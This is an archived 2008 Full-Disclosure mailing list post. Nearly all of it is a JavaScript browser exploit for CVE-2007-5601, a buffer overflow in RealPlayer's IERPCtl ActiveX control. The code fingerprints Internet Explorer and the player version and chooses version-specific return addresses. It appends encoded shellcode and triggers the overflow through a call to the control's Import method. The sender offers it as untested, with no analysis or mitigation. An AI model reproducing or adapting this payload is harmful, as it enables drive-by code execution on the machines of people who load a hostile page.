| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 7 Nov 2008 13:57:03 +0530
From: webDEViL <w3bd3vil@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: CVE-2007-5601exploit
Maybe this is of interest to someone....
Not tested.
This should relate to CVE-2007-5601
<script language="javascript">
eval("function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(RealVersion == "6.0.14.550")
ret = unescape("%63%11%04%60");
else if(RealVersion == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(RealVersion == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(RealVersion == "6.0.14.536")
ret = unescape("%51%11%70%63");
else
return;
if(RealVersion.indexOf("6.0.10.") != -1)
{
for(i=0;i<4;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.11.") != -1)
{
for(i=0;i<6;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.12.") != -1)
{
for(i=0;i<9;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.14.") != -1)
{
for(i=0;i<10;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
AdjESP = "LLLL\\XXXXXLD";
Shell =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp";
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "YuanGe"; // ?~??~-.=!
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();")
</script>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists